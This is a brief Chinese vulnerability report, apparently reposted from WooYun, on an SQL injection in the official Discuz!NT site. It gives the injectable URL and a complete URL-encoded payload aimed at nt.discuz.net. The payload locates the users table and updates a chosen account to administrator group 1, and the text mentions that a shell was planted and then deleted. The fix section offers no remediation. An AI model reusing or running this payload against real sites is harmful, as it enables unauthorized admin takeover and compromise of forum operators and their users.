简要描述:DNT官网存在SQL注入 漏洞 ,Powered by Discuz!NT 3.9.913 Beta 注入地址: http://nt.discuz.net/space/manage/ajax. asp x?AjaxTemplate=admin/usercontrols/ajaxtopicinfo.ascx&poster=1 利用: http://nt.discuz.net/space/manage/ajax.aspx?AjaxTemplate=admin/usercontrols/ajaxtopicinfo.ascx&poster=1%27%29;declare%20@t%20nvarchar%2840%29%20select%20@t=%28select%20top%201%20name%20from%20sysobjects%20where%20name%20like%27%_users%27%20and%20xtype=%27U%27%29%20exec%28%27update%20%27%2b@t%2b%27%20set%20groupid=1%20where%20username=%27%27xxxxx%27%27%27%29-- Shell 已经删除 漏洞证明: 修复方案: 应该懂得! 作者Jannock@乌云
查看更多关于Discuz!NT注入及修复 - 网站安全 - 自学php的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://haodehen.cn/did12474